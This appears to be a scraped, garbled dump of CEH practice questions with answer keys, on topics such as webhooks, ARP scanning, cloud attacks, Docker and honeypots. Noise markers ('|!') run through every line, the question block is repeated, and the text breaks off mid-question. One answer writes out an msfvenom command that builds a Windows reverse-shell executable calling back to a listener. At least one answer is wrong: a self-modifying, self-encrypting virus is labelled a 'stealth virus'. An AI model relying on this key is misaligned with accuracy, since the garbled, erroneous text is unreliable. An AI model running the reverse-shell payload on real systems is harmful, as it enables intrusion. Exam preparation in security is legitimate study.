Test v12 CEH Question s w ith cor r ect |! |! |! |! |! |!
detailed solution s |!
Susan, a software developer, wants her web API to update other applications
|! |! |! |! |! |! |! |! |! |! |! |!
with the latest information. For this purpose, she uses a user-defined HTTP
|! |! |! |! |! |! |! |! |! |! |! |!
tailback or push APIs that are raised based on trigger events: when invoked,
|! |! |! |! |! |! |! |! |! |! |! |! |!
this feature supplies data to other applications so that users can instantly
|! |! |! |! |! |! |! |! |! |! |! |!
receive real-time Information.Which of the following techniques is employed
|! |! |! |! |! |! |! |! |!
by Susan? - Correct answer ✔Webhooks
|! |! |! |! |!
Andrew is an Ethical Hacker who was assigned the task of discovering all the
|! |! |! |! |! |! |! |! |! |! |! |! |!
active devices hidden by a restrictive firewall in the IPv4 range in a given
|! |! |! |! |! |! |! |! |! |! |! |! |! |! |!
target network.Which of the following host discovery techniques must he use
|! |! |! |! |! |! |! |! |! |! |!
to perform the given task? - Correct answer ✔arp ping scan
|! |! |! |! |! |! |! |! |! |!
Alice, a professional hacker, targeted an organization's cloud services. She
|! |! |! |! |! |! |! |! |! |!
infiltrated the targets MSP provider by sending spear-phishing emails and
|! |! |! |! |! |! |! |! |! |!
distributed custom-made malware to compromise user accounts and gain |! |! |! |! |! |! |! |! |!
remote access to the cloud service. Further, she accessed the target customer
|! |! |! |! |! |! |! |! |! |! |! |!
profiles with her MSP account, compressed the customer data, and stored
|! |! |! |! |! |! |! |! |! |! |!
them in the MSP. Then, she used this information to launch further attacks
|! |! |! |! |! |! |! |! |! |! |! |! |!
on the target organization. Which of the following cloud attacks did Alice
|! |! |! |! |! |! |! |! |! |! |! |!
perform in the above scenario? - Correct answer ✔Cloud hopper attack
|! |! |! |! |! |! |! |! |! |!
Annie, a cloud security engineer, uses the Docker architecture to employ a
|! |! |! |! |! |! |! |! |! |! |! |!
client/server model in the application she is working on. She utilizes a |! |! |! |! |! |! |! |! |! |! |! |!
, component that can process API requests and handle various Docker objects, |! |! |! |! |! |! |! |! |! |! |!
such as containers, volumes. Images, and networks. What is the component
|! |! |! |! |! |! |! |! |! |! |!
of the Docker architecture used by Annie in the above scenario? - Correct
|! |! |! |! |! |! |! |! |! |! |! |! |!
answer ✔Docker daemon |! |!
what is the correct way of using MSFvenom to generate a reverse TCP
|! |! |! |! |! |! |! |! |! |! |! |! |!
shellcode for windows? - Correct answer ✔msfvenom -p |! |! |! |! |! |! |! |!
windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > |! |! |! |! |! |!
shell.exe
which of the following information security controls creates an appealing
|! |! |! |! |! |! |! |! |! |!
isolated environment for hackers to prevent them from compromising critical
|! |! |! |! |! |! |! |! |! |!
targets while simultaneously gathering information about the hacker? -
|! |! |! |! |! |! |! |! |!
Correct answer ✔Honeypot |! |!
infecting a system with malware and using phishing to gain credentials to a
|! |! |! |! |! |! |! |! |! |! |! |! |!
system or web application are examples of which phase of the ethical hacking
|! |! |! |! |! |! |! |! |! |! |! |!
methodology? - Correct answer ✔Gaining access
|! |! |! |! |! |!
which type of virus can change its own code and then cipher itself multiple
|! |! |! |! |! |! |! |! |! |! |! |! |! |!
times as it replicates? - Correct answer ✔Stealth virus
|! |! |! |! |! |! |! |!
Samuel a security administrator, is assessing the configuration of a web
|! |! |! |! |! |! |! |! |! |! |!
server. He noticed that the server permits SSlv2 connections, and the same
|! |! |! |! |! |! |! |! |! |! |! |!
private key certificate is used on a different server that allows SSLv2
|! |! |! |! |! |! |! |! |! |! |! |!
connections. This vulnerability makes the web server vulnerable to attacks as |! |! |! |! |! |! |! |! |! |! |!
the SSLv2 server can leak key information.Which of the following attacks can
|! |! |! |! |! |! |! |! |! |! |!
detailed solution s |!
Susan, a software developer, wants her web API to update other applications
|! |! |! |! |! |! |! |! |! |! |! |!
with the latest information. For this purpose, she uses a user-defined HTTP
|! |! |! |! |! |! |! |! |! |! |! |!
tailback or push APIs that are raised based on trigger events: when invoked,
|! |! |! |! |! |! |! |! |! |! |! |! |!
this feature supplies data to other applications so that users can instantly
|! |! |! |! |! |! |! |! |! |! |! |!
receive real-time Information.Which of the following techniques is employed
|! |! |! |! |! |! |! |! |!
by Susan? - Correct answer ✔Webhooks
|! |! |! |! |!
Andrew is an Ethical Hacker who was assigned the task of discovering all the
|! |! |! |! |! |! |! |! |! |! |! |! |!
active devices hidden by a restrictive firewall in the IPv4 range in a given
|! |! |! |! |! |! |! |! |! |! |! |! |! |! |!
target network.Which of the following host discovery techniques must he use
|! |! |! |! |! |! |! |! |! |! |!
to perform the given task? - Correct answer ✔arp ping scan
|! |! |! |! |! |! |! |! |! |!
Alice, a professional hacker, targeted an organization's cloud services. She
|! |! |! |! |! |! |! |! |! |!
infiltrated the targets MSP provider by sending spear-phishing emails and
|! |! |! |! |! |! |! |! |! |!
distributed custom-made malware to compromise user accounts and gain |! |! |! |! |! |! |! |! |!
remote access to the cloud service. Further, she accessed the target customer
|! |! |! |! |! |! |! |! |! |! |! |!
profiles with her MSP account, compressed the customer data, and stored
|! |! |! |! |! |! |! |! |! |! |!
them in the MSP. Then, she used this information to launch further attacks
|! |! |! |! |! |! |! |! |! |! |! |! |!
on the target organization. Which of the following cloud attacks did Alice
|! |! |! |! |! |! |! |! |! |! |! |!
perform in the above scenario? - Correct answer ✔Cloud hopper attack
|! |! |! |! |! |! |! |! |! |!
Annie, a cloud security engineer, uses the Docker architecture to employ a
|! |! |! |! |! |! |! |! |! |! |! |!
client/server model in the application she is working on. She utilizes a |! |! |! |! |! |! |! |! |! |! |! |!
, component that can process API requests and handle various Docker objects, |! |! |! |! |! |! |! |! |! |! |!
such as containers, volumes. Images, and networks. What is the component
|! |! |! |! |! |! |! |! |! |! |!
of the Docker architecture used by Annie in the above scenario? - Correct
|! |! |! |! |! |! |! |! |! |! |! |! |!
answer ✔Docker daemon |! |!
what is the correct way of using MSFvenom to generate a reverse TCP
|! |! |! |! |! |! |! |! |! |! |! |! |!
shellcode for windows? - Correct answer ✔msfvenom -p |! |! |! |! |! |! |! |!
windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > |! |! |! |! |! |!
shell.exe
which of the following information security controls creates an appealing
|! |! |! |! |! |! |! |! |! |!
isolated environment for hackers to prevent them from compromising critical
|! |! |! |! |! |! |! |! |! |!
targets while simultaneously gathering information about the hacker? -
|! |! |! |! |! |! |! |! |!
Correct answer ✔Honeypot |! |!
infecting a system with malware and using phishing to gain credentials to a
|! |! |! |! |! |! |! |! |! |! |! |! |!
system or web application are examples of which phase of the ethical hacking
|! |! |! |! |! |! |! |! |! |! |! |!
methodology? - Correct answer ✔Gaining access
|! |! |! |! |! |!
which type of virus can change its own code and then cipher itself multiple
|! |! |! |! |! |! |! |! |! |! |! |! |! |!
times as it replicates? - Correct answer ✔Stealth virus
|! |! |! |! |! |! |! |!
Samuel a security administrator, is assessing the configuration of a web
|! |! |! |! |! |! |! |! |! |! |!
server. He noticed that the server permits SSlv2 connections, and the same
|! |! |! |! |! |! |! |! |! |! |! |!
private key certificate is used on a different server that allows SSLv2
|! |! |! |! |! |! |! |! |! |! |! |!
connections. This vulnerability makes the web server vulnerable to attacks as |! |! |! |! |! |! |! |! |! |! |!
the SSLv2 server can leak key information.Which of the following attacks can
|! |! |! |! |! |! |! |! |! |! |!